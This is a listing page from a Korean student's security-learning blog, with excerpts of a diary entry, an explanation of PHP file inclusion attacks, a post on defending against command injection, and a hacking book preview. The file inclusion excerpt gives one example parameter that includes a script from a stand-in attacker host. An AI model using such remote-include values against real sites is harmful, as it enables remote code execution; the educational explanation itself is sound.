728x90 컴퓨터공부4 하루를 시작하기 전 다짐#7 안녕하세요 옆집컴공생입니다. 오늘은 학교를 올라오는 버스 안에서 성추행 사건이 발생했어요ㅠ 그래도 당찬 여성분이셔서 소리를 크게 지르시고 버스아저씨도 버스를 세워주셔서 경찰에 무사히 이송할 수 있었답니다. 제가 목격자였으면 좋았을텐데 보지를 못해서 도와드릴 수 없었던 점이 죄송하네요ㅠ 나쁜 사람 다 잡혀가야하는데요... 그 분도 충격이 크지 않으셨으면 ..ㅠㅠ 하아 어쨌든 오늘 하루도 열심히 살아야겠죠. 저는 오늘 연구실 잡일을 하고 수업도 다 있는 날이라 바쁠거 같아요. 그리고 저녁에 반년동안 못 본 동기 친구와도 식사가 있어서..(동기인데 코로나 때문에 반년동안 못 만났어요 0 ㅡ 0) 오늘 할일 1. 연구실 잡일 최대한 많이 하기 2. 나동빈님 영상보기 3. 수업 잘 듣고 복습 잘하기 4. 파이썬 .. 2020. 6. 2. 파일 인클루젼 공격 안녕하세요. 오늘은 파일 인클루젼 공격에 대해 알아보겠습니다. 파일 인클루젼 공격은 주로 PHP Application 에서 발생합니다. 그 이유는 PHP include() 로 앱 요청을 지정할 수 있다면 파일을 직접 소스코드에 삽입할 수 있기 때문입니다. -로컬파일인클루젼(LFI) : 웹 서버에 이미 존재하고 있는 파일을 인클루드 -리모트파일인클루젼(RFI) : LFI 보다 더 강력한 공격으로 원격으로 외부에 있는 파일을 인클루드 정상적 웹 사이트 page=file.php 이렇게 파일을 인클루드 하는데 해커는 자신의 사이트를 통해 page = htpp://hacker.com/bad.php 인클루드 시켜버립니다. 만약 검사를 따로 하지 않는다면 웹 사이트는 그대로 악성코드를 실행시키게 되는 겁니다. 이제 .. 2020. 5. 4. 커맨드 인젝션 공격 대응 https://com24everyday.tistory.com/32?category=1114111 커맨드인젝션 공격 안녕하세요. 부산 공수니입니다. 오늘은 '커맨드 인젝션'에 대해 알아보겠습니다. 바로 Go. 컨맨드 인젝션은 명령어를 삽입한다는 뜻으로 웹을 통해 시스템 명령어를 실행하는 공격입니다. 만약 웹 내부에서 시스.. com24everyday.tistory.com 커맨드 인젝션 공격 대응을 알아보겠습니다! 커맨드 인젝션을 잘 모르시는 분은 위 포스팅으로 갔다와주세요ㅎㅎ 커맨드 인젝션에 가장 좋은 대응 방안은 입력 값이 적절한 값인지 조사하는 것 입니다. DVWA 에서 했듯이 IP 주소를 입력받는 거라면 입력값이 실제로 IP 주소인지 검증하는 과정이 들어가면 좋습니다. DVWA 의 'impossibl.. 2020. 5. 2. 해킹 공격의 예술_Preview 안녕하세요. 보안전문가가 되고픈 부산공수니입니다. 해킹 책으로 무슨 책을 살지 고민하다가 '해킹 공격의 예술'이라는 책을 사게 됐습니다. 요새 인터넷에 자료가 많다지만 책으로 공부하는 습관이 남아있는지라 책을 많이 보게 되네요ㅎㅎ https://book.naver.com/bookdb/book_detail.nhn?bid=6247656 해킹 진정한 해킹을 위한 핵심 기술 해킹은 어려운 문제에 대한 새로운 해결책을 찾거나 조잡한 프로그램의 보안 취약점을 찾는 등의 창조적인 문제를 해결하는 예술이다. 많은 사람이 자신이 해커라고 생각하지만 최고의 해커가 되는 데 필요한 핵심 기술을 갖고 있는 사람은 거의 없다. 이 책의 저자 존 에릭슨은 현존하는 공격 기법의 실행을 단순히 보여주는 데 그치지 않고 비밀스러운 해.. 2020. 4. 17. 이전 1 다음 728x90
